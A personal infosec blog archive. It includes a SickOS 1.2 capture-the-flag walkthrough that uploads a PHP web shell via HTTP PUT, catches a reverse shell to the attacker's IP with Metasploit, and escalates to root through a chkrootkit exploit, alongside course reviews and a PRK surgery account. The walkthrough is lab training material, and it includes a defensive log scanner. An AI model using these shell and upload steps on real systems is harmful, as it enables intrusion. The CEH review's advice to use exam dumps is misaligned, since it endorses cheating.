Uncategorized

Mini SOC Project

I’m glad to announce that my graduation project at Applied Science Private University is done!

It will go live very soon!

#MiniSOC is a cloud solution for vulnerability assessment where you can scan your website, or any device connected to the internet, integrated with the latest cloud computing technology.

#AWS #cloudflare #soc

#cybersecurity #pentest #vulnerability

#vulnerabilityassessment #securityautomation #security

Uncategorized

PRK Vision Correction Surgery

To clarify at the outset, there are several correction procedures: laser, LASIK and Femto-LASIK. The procedure explained here is PRK.

It is a procedure developed from LASIK; none of them is "the best", they are simply different techniques for treating the cornea.

The content of this blog is about my personal experience and is not an approved medical reference.

The PRK procedure

Photorefractive Keratectomy

It consists of removing a layer of the cornea so that its curvature returns to its natural shape, and in this way vision is corrected.

In the first stage, the eye is anaesthetised.

In the second stage, an upper layer of the cornea is cut with a laser device, without any sensation of pain.

In the third stage, the doctor removes the old layer of the cornea.

In the fourth stage, a temporary transparent lens is placed for 3 days until the cornea heals and to protect the wound area.

Before the procedure, make sure the corneal thickness has been measured and that it allows the procedure to be performed.

At a thickness of 270 to 300 the risk of corneal displacement increases and the procedure cannot be performed.

The thickness is supposed to be 300 or more, and of course this is decided in consultation with the doctor.

Below is a picture of the patient's vision before and after the procedure.

On the left: before the procedure, without wearing glasses.

In the middle: from one to three days after the procedure, you feel as though there is water between you and what you see.

On the right: vision improves and becomes like this from one week to three weeks.

Normal vision returns gradually over one week to one month:

First week 25%

Second week 50%

Third week 80%

Fourth week 100%

The procedure takes 10 minutes for both eyes.

After the procedure you may not be able to look at bright lights, including the sun, the phone screen and the television.

You will feel the urge to rub your eyes, but rubbing them is forbidden until the lenses are removed.

It is advisable to shower before going to the hospital, because you will not be able to wash your eyes for a week after the procedure.

Because you will hate bright light, you will wear sunglasses that protect against light and dust for two days after the procedure.

You will be given three kinds of eye drops (antibiotic, moisturising, and drops to clear the vision).

If computers are part of your daily work or study, zooming the screen to 200% will be a great way to see clearly!

A final piece of advice: I had watched the procedure through the doctor's Snapchat account before going in, and I do not recommend this.

You may feel imagined pain before going in for the procedure, but in reality, during the procedure, you will be under anaesthetic and will not feel any pain.

Explanation of the procedure

References:

https://www.katzeneye.com/what-is-prk/

https://www.allaboutvision.com/visionsurgery/prk.htm

 

Information Security

SickOS 1.2 Walkthrough

 

SickOS 1.2
This machine can be downloaded from:
Set the network adapter to NAT if you are using VMware.
Scan for the local IP via the netdiscover command:
    netdiscover
IP: 192.168.236.136
It may be different in your lab.
Scan the target IP with nmap using the default options:
    nmap -A -vv -T4 192.168.236.136
We detect that two ports are open: 22/tcp and 80/tcp.
Scan all TCP ports; for faster usage we can use zenmap:
  • Type zenmap to open the zenmap tool.
  • Type the IP in Target: 192.168.236.136
  • Choose from Profile: Intense scan, all TCP ports
As shown in the screenshot, this runs:
    nmap -p 1-65535 -T4 -A -v 192.168.236.136
Scan all UDP ports:
  • Type the IP in Target: 192.168.236.136
  • Choose from Profile: Intense scan plus UDP
We didn’t find useful ports in the UDP scan, so we go back to the TCP scan.
Since we determined that port 80 is open on the target, we will browse to it.
We run nikto to scan the web server and detect directories on that host:
    nikto -h 192.168.236.136
Since there is no useful result, we run DirBuster with the medium wordlist to find directories with a different tool:
  • Type http://192.168.236.136 in the Target text field.
  • Check Go Faster to speed up the process.
  • Choose the wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start.
Then we detect a “test” directory; let’s open it in the browser.
Let’s analyse the page and open View Source.
Nothing useful, so we analyse the server side, either via Burp Suite or via the curl command, and use OPTIONS to determine which web methods are allowed:
    curl -v -X OPTIONS http://192.168.236.136/test
After we detect that the PUT method is allowed, we can upload our shell either via Burp Suite or via Nmap.
Let us generate the shell first.
I use a ready-made shell that comes with Kali by default; find it using:
    locate shell
Copy the shell and rename it shell.php:
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit shell.php via the command:
    nano shell.php
and set the callback address and port:
    $ip = '192.168.236.135';    // Kali IP
    $port = 443;                // because 4444 isn't working
Upload it with the Nmap http-put script:
    nmap -p 80 192.168.236.136 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
Successfully created!
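The defender's side of the PUT-upload step above, as an added example that is not part of the original walkthrough: a scanner that reads web server access log lines (the sample lines are constructed, not real SickOS output) and flags write methods, rating a successful PUT of a script file such as /test/shell.php as high severity.

```python
"""Flag HTTP write methods in web server access logs (added example, constructed logs).

The foothold above relies on the server answering OPTIONS with PUT allowed and then
accepting a PUT of shell.php; in the access log that is a PUT with a 2xx status on a
script-extension path. The log lines below are constructed, not real SickOS output.
"""
import re

# Common Log Format: host ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Methods that modify server content; none should reach a plain webroot.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

def classify(method, path, status):
    """Severity for one request, or None if it is not a write method."""
    if method not in WRITE_METHODS:
        return None
    succeeded = 200 <= status < 300
    # A successful PUT of a script file is the web-shell-upload pattern itself.
    if method == "PUT" and succeeded and path.lower().endswith(SCRIPT_EXT):
        return "high"
    return "medium" if succeeded else "low"

def scan_access_log(lines):
    """Return (host, method, path, status, severity) for every write request seen."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        status = int(m.group("status"))
        sev = classify(m.group("method"), m.group("path"), status)
        if sev:
            findings.append((m.group("host"), m.group("method"), m.group("path"), status, sev))
    return findings

# Constructed sample: OPTIONS probe, successful PUT of a PHP file, the file being fetched,
# a rejected PUT from another host, and ordinary traffic.
SAMPLE_LOG = [
    '192.168.236.135 - - [10/Jun/2018:14:02:11 +0300] "OPTIONS /test HTTP/1.1" 200 0',
    '192.168.236.135 - - [10/Jun/2018:14:05:42 +0300] "PUT /test/shell.php HTTP/1.1" 201 0',
    '192.168.236.135 - - [10/Jun/2018:14:06:03 +0300] "GET /test/shell.php HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Jun/2018:14:07:00 +0300] "PUT /test/notes.txt HTTP/1.1" 403 0',
    '10.0.0.8 - - [10/Jun/2018:14:08:00 +0300] "GET /index.php HTTP/1.1" 200 1400',
]

if __name__ == "__main__":
    for host, method, path, status, sev in scan_access_log(SAMPLE_LOG):
        print(f"[{sev}] {host} {method} {path} -> {status}")
```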
Now we have to make a listener, in one of two ways: nc -lvp 443 or Metasploit. I prefer Metasploit for the privilege escalation later.
We use the payload php/reverse_php because we generated a plain shell, not Meterpreter, and that works for me.
Set the local host (Kali IP) and port (443) as we did in the shell previously.
Then we type exploit -jz to run the session in the background.
    msfconsole
    use exploit/multi/handler
    set payload php/reverse_php
    set LHOST 192.168.236.135
    set LPORT 443
    exploit -jz
The final options are shown in the screenshot.
Then we trigger this shell via the browser.
Finally we got a user shell!
But with the normal user www-data.
For privilege escalation, first we check what is present and running with root privileges:
    ls -la
We saw that the chkrootkit line has root privileges:
    drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After looking for a vulnerability on Google we discovered the chkrootkit vulnerability CVE-2014-0476, which could allow me to escalate my privileges with a Metasploit module:
  • use exploit/unix/local/chkrootkit
  • set session 1
Enter the following commands as shown in the given image to load the exploit/unix/local/chkrootkit module, then set session 1 and an arbitrary lport such as 8080, and run the module.
For me, I set session 3 because I had already opened sessions 1 and 2.
Type
    info
Make sure about lport with the options command.
Then type run.
Session 4 opened, in my case!
Type id to see the privileges of the account.
Now we are root!
Open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text file for the final flag:
    cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
I hope you enjoyed it!
Contact me on Twitter:
Information Security

ECSA v10 Review

ECSA (EC-Council Security Analyst) v10 Review:

Hi there,

Today I will write about ECSA; it’s an advanced penetration testing course (EC-Council Security Analyst).

You can find the official website of this course here:

www.eccouncil.org/programs/certified-security-analyst-ecsa/

This write-up describes my experience and does not necessarily cover all parts. Let’s move to the prerequisites of this course:

You need CEH (course and practical) in the new version 10.
I had CEHv9 in Dec 2017.

The Course:
This course extends your knowledge from just knowing the information and tools to using the information you learnt in CEH and reusing the tools with some advanced techniques.

When you look at the syllabus of ECSA you will see interesting topics such as cloud hacking, IoT hacking, database hacking, and internal and external penetration testing, but the truth is different.

The Benefits:

To be honest, the golden key in this course is that it teaches you how to engage with the security industry, how to apply for a pentest project, and how to complete all the business paperwork before and after the proposal.

As EC-Council always does, their courses contain a lot of theoretical knowledge compared to the practical part, and that is what makes their courses not good enough to take.

ECSA v10 has 16 modules + 10 for self-study, and all of them are just slideshows.
If you are looking only for deep information, you can enrol in it.

The practical section is a website named iLab.
iLab is a virtual environment with Windows (Server / 8 / 10) and Kali, Ubuntu and BackTrack, divided up as company departments to apply all the labs.

My Experience:
OK, by now we have learnt the outline of the course, but we have not yet got to my experience and recommendations regarding ECSA.

I am planning to take OSCP, but I didn’t feel my pentest skills were advanced enough after CEH to go for OSCP, and that’s why I took ECSA to improve my current penetration testing experience.

The course, as I mentioned, contains a lot of theoretical information relative to the practical part. So, if you are looking for a practical penetration testing course, you shouldn’t be here.

The course repeats many labs from CEH, which is bad for me. I expected more advanced techniques rather than just using old and expired tools, repeating exactly the CEH labs, and hacking with Metasploit.

To mention some detailed examples: Nmap has one more bash script to scan with, which was new for me, and there is one exploit-editing lab.

The modules contain some repeated labs: if we look at cloud, you will apply the XSS attack that was in the web module.
If you look at the database lab, you will reuse SQL injection, but here just to retrieve database tables.

I faced a lot of issues with SQL labs that did not work. In addition, when I contacted lab support they were slow to reply, and finally the answer was that the issue had been forwarded to the related department, and that’s it.

The screenshots and results shown are very different from what I see when I apply the labs.
In Wi-Fi hacking, the scenario we all know is breaking an access point, or even penetrating the router from outside to get into the local network.

But the truth is that the lab has you make a virus for old Android devices and then break the 4-way handshake, which is too far from just Wi-Fi hacking!

In version 10 they removed report writing and the hacking challenges and separated them into another course they call ECSA Practical, for commercial reasons.

After all that, I finished the lab, and for the first time I am not satisfied with a course, so I don’t recommend anyone who needs an advanced penetration testing course to enrol in it.

I only recommend it for managers, or for those who just need the knowledge to work with pentesters rather than to do penetration testing themselves.

When I evaluated the training course, they forwarded all my notes to the training centre instead of reading them, investigating the reasons and trying to fix them.

 

Uncategorized

Certified Ethical Hacker Review (CEHv9)

 

This is my first review of an international course and exam.

I will write about the preparation for this course.

Beginning:

First of all, you need to be in an IT environment, as a student or an employee; otherwise you have to take external courses such as databases, a web programming language, operating systems, and finally, the must: computer networks.

  • The above courses are meant for non-IT people, or for IT people who are not yet familiar with SQL and computer networks.
  • You can take them via CCNA or Network+, plus a basic web programming language so that you can edit HTML code, or PHP at an advanced level.
  • Basic Linux commands will help you in the Kali Linux labs; don’t worry, 80% of the course is applied on Windows Server 😉

 

The Course:

CEH has 18 modules talking about technology and how you can secure it from several attacks.

They include:

  1. Information Gathering.
  2. Network Scanning.
  3. Enumeration.
  4. System Hacking.
  5. Web Hacking.
  6. SQL Injection.
  7. Wireless Hacking.
  8. Cloud Computing.
  9. IOT Hacking (New).
  10. Vulnerability (Assessment).
  11. WIFI Hacking.
  12. Sniffing.
  13. Malware Threats.
  14. Mobile Hacking.
  15. Evading Firewall, IDS, IPS.
  16. Covering Tracks.

Basically this is just a brief of the course outline.

My journey took around 2 months of course attendance, and around 3 months of preparation for the exam to read and apply all the material covered.

I took CEHv9 and I faced a lot of expired tools and labs; don’t worry, just google the command or lab topic and you will find the alternative command.

You will face old attacks such as SSLStrip to sniff the Facebook password, which is outdated because they changed the protocol used to transfer credentials over the local network.

The course is really awesome; it gives you the full knowledge of hacking with real-world examples. But you need to keep up with your instructor, because you will take in a lot of information.

In addition to a lot of information, the applied labs will cover the important topics like system hacking and introduce technologies like cloud computing.

Your book is your friend: the CEH book covers all the basic information, and you can also ask EC-Council support to help you with any issue.

 

The Exam:

The CEH exam has 125 questions, all of them multiple choice, focusing on all the material and on important topics such as:

  • Nmap parameters, around 5 questions.
  • Hacking ethics.
  • XSS, CSRF, SQL.
  • Linux commands.
  • Wi-Fi table and ranges.
  • Scenario-based questions.

The secret key to the final exam is that you can look for a dump and get an idea of the exam; it may cover around 60% of the exam, depending on the dump release date.

You need to apply all the labs to make sure you have covered all the knowledge in the course.

There are no practical questions in the exam.

The exam is an online web app, not like other offline emulator environments.

Finally:

This course is for beginners and the opening door to a penetration testing and information security career.

You can continue on this track via ECSA (Security Analyst) and LPT (Master Penetration Testing).

Happy Hacking!

 

Abdulghani Alkhateeb

CEHv9, CCNA, Network System Student @ A.S.U

Find me on Twitter

Or Contacts

Uncategorized

Jordan InfoSec CTF-01 walkthrough


Hello All,

Today I will write my first walkthrough of an easy VM: Jordan InfoSec.

First, download the VM from here:

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

This challenge has 5 flags; you need to use some Linux and basic hacking techniques to find the flags.

You may need these commands during this challenge:

  • ls -a : to look for hidden files
  • ls -l : to look at permissions
  • find -name : to look for files
  • cat : to open text files

I wrote it in a PDF to minimise the upload size 😉

Good Luck!

Jordan InfoSec CTF-01 Walkthrough

Contact